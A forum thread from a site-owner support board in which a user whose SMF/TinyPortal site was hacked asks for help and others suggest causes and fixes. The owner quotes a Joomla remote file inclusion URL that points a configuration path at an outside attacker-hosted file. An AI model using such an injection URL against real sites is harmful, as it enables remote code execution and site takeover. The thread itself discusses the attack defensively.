GFXINDIA.COM HACKED

[GeofMauser]

I got SMF RC3 with TP 095.

But for now i close my mouth. I am waiting with the shoutbox disabled. If in some days have not attacs, then it means that the problem is from ShoutBox. If the attacs still well ... i make suicide!

[akulion]

so ur safe and sound :up: as far as tp is concerned

hacking on ur site could be the result of weak server security and its probably a host issue

also just to let u know, banning by IP is effctive but also very harmful because if the person dosent have a static ip and uses a dynamic IP from their ISP then you could end up blocking all the users who belong to that IP range who may visit your site

Nearly all isp's use a single IP to identify their users and further ip mapping is done on their end in their server....so extrnally it shows one IP only

and if u ban it then its "bue bye everyone else" who may be a customer belonging to that IP range on that ISP

[Xarcell]

Change your FTP password. Also take a look at your other FTP accounts, if you have any.

[GeofMauser]

First, this is not against TP, i love a lot TP. This is a call for help.


I know, i think that you have a lot of more experience that i. Then i tell you about:

The last two hacks in my site, the hacker put into my root folder directory, a file named: Admin.php, of 128 kbts and from this Admin.php, the hacker have deleted all my root site. 

Know you some another case in another people that have this kind of problem with hack?

Know someone how this guy can put a php file into a root in a domain?.

[Thurnok]

The only way someone can place a php file in the root of your domain is:

A) They got either the server root password or your ssh/ftp userid & password and placed it there.

B) You had an unprotected php program (a filemanager for instance) that they got the userid/password for and used it to place it there.

In otherwords, it was either a server security issue or your own security issue.

There is one more possibility, though much less likely, that an employee of your host provider did it.

[Xarcell]

Ya, I strongly agree.

I don't see someone could just hack through TP/SMF to the point of deleting your whole root directory. The odds of that happening are next to nil.

Did you change your FTP password as I suggested?

[GeofMauser]

yes, i have changed de password for FTP lot of times for passowrds likethis:

sample:

Rt5R4Eer54E4Te44tEe

But i have a questyon:

this bug (Jommla bug) is form other forum system, but in SMF can hacker doing some like this?:

http://www.victimsite.com/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1 &GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/pablin77/pa.html


Where http://www.freewebs.com/pablin77/pa.html is the hacker site, and hacker file (pa.html), with the hacker replace de contents of index.php from SMF o another file from SMF.

[IchBin]

As Thurnok pointed out, someone must have access to be able to place files or change them. Of course if a hacker is going to redirect your site which file are they going to use? index.html or index.php because that is the default display file. You should really talk to your host about this so that maybe they can figure out how they're getting access.

SMF and TP protect against those kind of code executions by adding checks and sessions checks etc. So I don't see it possible with SMF and TP.

[IchBin]

Are you running any other scripts on your site? Like a gallery or anything?

[G6Cad]

Have any one read through this thread
It seems to be a rather OLD thread with an OLD question